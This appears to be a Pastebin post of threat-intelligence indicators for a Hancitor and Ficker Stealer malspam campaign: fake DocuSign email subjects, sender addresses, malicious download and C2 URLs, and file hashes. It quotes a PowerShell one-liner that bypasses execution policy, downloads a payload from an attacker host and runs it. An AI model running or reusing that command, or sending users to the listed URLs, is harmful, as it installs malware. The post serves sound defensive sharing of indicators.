Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- THREAT IDENTIFICATION: HANCITOR / FICKER STEALER
- HANCITOR BUILD NUMBER
- BUILD=0707in2_wvcr
- SUBJECTS OBSERVED
- You got invoice from DocuSign Electronic Service
- You got invoice from DocuSign Electronic Signature Service
- You got invoice from DocuSign Service
- You got invoice from DocuSign Signature Service
- You got notification from DocuSign Electronic Service
- You got notification from DocuSign Electronic Signature Service
- You got notification from DocuSign Service
- You got notification from DocuSign Signature Service
- You received invoice from DocuSign Electronic Service
- You received invoice from DocuSign Electronic Signature Service
- You received invoice from DocuSign Service
- You received invoice from DocuSign Signature Service
- You received notification from DocuSign Electronic Service
- You received notification from DocuSign Electronic Signature Service
- You received notification from DocuSign Service
- You received notification from DocuSign Signature Service
- SENDERS OBSERVED
- afrnpid@cabanga.com
- ahiuddy@cabanga.com
- awof@cabanga.com
- eiiezqo@cabanga.com
- epyiagi@cabanga.com
- gozinuj@cabanga.com
- guirv@cabanga.com
- hbgyo@cabanga.com
- hyoqxoc@cabanga.com
- iedeyuy@cabanga.com
- ieo@cabanga.com
- ilaybu@cabanga.com
- iyoga@cabanga.com
- jjuzwxv@cabanga.com
- jypol@cabanga.com
- lweuis@cabanga.com
- lyfovuk@cabanga.com
- niohkod@cabanga.com
- nu@cabanga.com
- oiqabsy@cabanga.com
- owagov@cabanga.com
- owurymc@cabanga.com
- pitaxab@cabanga.com
- pmaooi@cabanga.com
- q@cabanga.com
- qiudi@cabanga.com
- rdyeurg@cabanga.com
- ryzyuxe@cabanga.com
- s@cabanga.com
- segyyby@cabanga.com
- shzeaa@cabanga.com
- too@cabanga.com
- un@cabanga.com
- wyoipi@cabanga.com
- xrbime@cabanga.com
- yhmuogf@cabanga.com
- ytcn@cabanga.com
- zvyesus@cabanga.com
- MALDOC PROXY DISTRIBUTION URLS
- http://feedproxy.google.com/~r/aadrkvpwohr/~3/hvqIAWB8ZGo/legend.php
- http://feedproxy.google.com/~r/aaigmlntaz/~3/zDMjq9cpjP0/purported.php
- http://feedproxy.google.com/~r/agrfofpkhoi/~3/Nvuc4ZHoAuU/trafficked.php
- http://feedproxy.google.com/~r/aoqdbq/~3/lgYeMYdoVFs/edelweiss.php
- http://feedproxy.google.com/~r/bcoycuchq/~3/85TxsQt3Q1A/expatiate.php
- http://feedproxy.google.com/~r/bfaiobxnn/~3/40BvVc5LU1I/nondestructive.php
- http://feedproxy.google.com/~r/ccfhf/~3/YPVRRIvUyF0/detrition.php
- http://feedproxy.google.com/~r/conikypz/~3/zYdenqefeFM/polemic.php
- http://feedproxy.google.com/~r/eapqs/~3/PXLELUQiOIM/enabled.php
- http://feedproxy.google.com/~r/eaxffuyn/~3/MPqSB8haPFM/pointedness.php
- http://feedproxy.google.com/~r/efuzvpwwuw/~3/Ju_TpdCJw7o/trover.php
- http://feedproxy.google.com/~r/ggwrkvfiz/~3/5AZsEWUuj0w/wrath.php
- http://feedproxy.google.com/~r/gidppccnezk/~3/8yvHqCvJiiA/limp.php
- http://feedproxy.google.com/~r/higcitfx/~3/rrnrD2uQluU/funny.php
- http://feedproxy.google.com/~r/huwwygzkokv/~3/3N-X0bO5epU/isle.php
- http://feedproxy.google.com/~r/igxzzrinx/~3/Z97ozNdjlSA/siderite.php
- http://feedproxy.google.com/~r/kkyknzxqa/~3/OSA0nIazKI4/presumed.php
- http://feedproxy.google.com/~r/lfmzx/~3/DIfbI5M9auQ/schoolmarm.php
- http://feedproxy.google.com/~r/mezzzkrooh/~3/gM2AilSs-2U/witnesser.php
- http://feedproxy.google.com/~r/oehvfutz/~3/J8P7yN6ucko/toothless.php
- http://feedproxy.google.com/~r/ogitcfzsl/~3/5Psg9vP0R7k/sleekness.php
- http://feedproxy.google.com/~r/oivbslq/~3/8sJ-OEQ-QKk/sinned.php
- http://feedproxy.google.com/~r/puyhr/~3/c91Mx9dCypw/tuba.php
- http://feedproxy.google.com/~r/qvdii/~3/lgxzfGdyDyo/greeting.php
- http://feedproxy.google.com/~r/reibxjjfqv/~3/YHK3BGNsq0Q/tangibly.php
- http://feedproxy.google.com/~r/rtiuexidp/~3/L0TOvxtMT4E/aboard.php
- http://feedproxy.google.com/~r/sjsovniji/~3/j9cG3K3J4SU/interpretation.php
- http://feedproxy.google.com/~r/slcqfyy/~3/IPa4MfWbIUs/practitioner.php
- http://feedproxy.google.com/~r/sxdcbtwtun/~3/CKI5VDNqNpM/versification.php
- http://feedproxy.google.com/~r/vmfctlny/~3/0kW56lAJalM/firmament.php
- http://feedproxy.google.com/~r/vtvqpysqgjx/~3/sG4SsBpOZNM/monument.php
- http://feedproxy.google.com/~r/wwenrdi/~3/ZVOWXtVkwCo/antimatter.php
- http://feedproxy.google.com/~r/ymtonk/~3/e2Kt7bOAP10/cutlass.php
- MALDOC REDIRECT DOWNLOAD URLS
- http://an.nastena.lv/greeting.php
- http://catface.us/expatiate.php
- http://gbsports.theapplab.org/tuba.php
- http://gbsports.theapplab.org/wrath.php
- http://grecozenobi.com.ar/presumed.php
- http://grecozenobi.com.ar/sinned.php
- http://grecozenobi.com.ar/trover.php
- http://greechip.net/polemic.php
- http://gunsify.com/sleekness.php
- http://homevault.co.uk/aboard.php
- http://homevault.co.uk/enabled.php
- http://jaxthemessenger.com/witnesser.php
- http://maoptions.xyz/detrition.php
- http://maoptions.xyz/monument.php
- http://maoptions.xyz/trafficked.php
- http://new.novapilates.com/versification.php
- http://nextclickcorp.net/nondestructive.php
- http://nextclickcorp.net/practitioner.php
- http://pphc.welkinfortprojects.com/edelweiss.php
- http://pphc.welkinfortprojects.com/limp.php
- http://seatranscorp.com/cutlass.php
- http://seatranscorp.com/purported.php
- http://seatranscorp.com/toothless.php
- http://sportsrunouts.com/antimatter.php
- http://sportsrunouts.com/isle.php
- http://sportsrunouts.com/tangibly.php
- http://turquoisecoaching.co.uk/funny.php
- http://turquoisecoaching.co.uk/pointedness.php
- http://virfilms.in/interpretation.php
- http://virfilms.in/siderite.php
- http://vivo.com.pk/firmament.php
- https://www.adstudiophotography.com/legend.php
- https://www.adstudiophotography.com/schoolmarm.php
- adstudiophotography.com
- catface.us
- grecozenobi.com.ar
- greechip.net
- gunsify.com
- homevault.co.uk
- jaxthemessenger.com
- maoptions.xyz
- nastena.lv
- nextclickcorp.net
- novapilates.com
- seatranscorp.com
- sportsrunouts.com
- theapplab.org
- turquoisecoaching.co.uk
- virfilms.in
- vivo.com.pk
- welkinfortprojects.com
- MALDOC XLL FILE HASHES
- 0708_891792481.xll
- 41e0318dfdb1c180a375a7efc712649e
- MALDOC DOC FILE HASHES
- 46b5387cedf436ebd2c0800f2e8297e2
- 4bdfb6932eba2bb3cbce59a2bae3cee2
- aec795705d76fe4e3a66adbace539656
- b4144d8e8e735f9a24f8c6e043438077
- d32db402317d36e8a207d5b5a71d6cac
- e071a5ed02d41002303b7e5763bfb307
- HANCITOR PAYLOAD DOWNLOAD URLS
- (this proceeded from running the .xll file)
- http://srand04rf.ru/92375234.xml
- http://srand04rf.ru/08.jpg
- HANCITOR PAYLOAD FILE HASH
- (as usual, this was dropped after enabling macros in the .doc file)
- niberius.dll
- 378d5008e351365908e039475b7180b0
- POWERSHELL SCRIPT FROM OPENING THE XLL FILE
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg' -OuTfIle 'c:\Users\Public\snd32sys.exe';
- sTart 'c:\Users\Public\snd32sys.exe'
- (this proceeded from running the .xll file)
- 92375234.xml
- 71999a9d2f15e164c9b1fa926aa6444b
- res32.hta (same hash)
- 71999a9d2f15e164c9b1fa926aa6444b
- ----------------------------------------
- 08.jpg
- ed1921467f6784af6bdca40a06a541b5
- snd32sys.exe (same hash)
- ed1921467f6784af6bdca40a06a541b5
- HANCITOR C2
- http://anspossthrly.ru/8/forum.php
- http://sudepallon.com/8/forum.php
- http://thentabecon.ru/8/forum.php
- FICKER STEALER DOWNLOAD URL
- http://srand04rf.ru/7hfjsdfjks.exe
- FICKER STEALER FILE HASH
- 7hfjsdfjks.exe
- 270c3859591599642bd15167765246e3
- FICKER C2
- http://pospvisis.com
Add Comment
Please, Sign In to add comment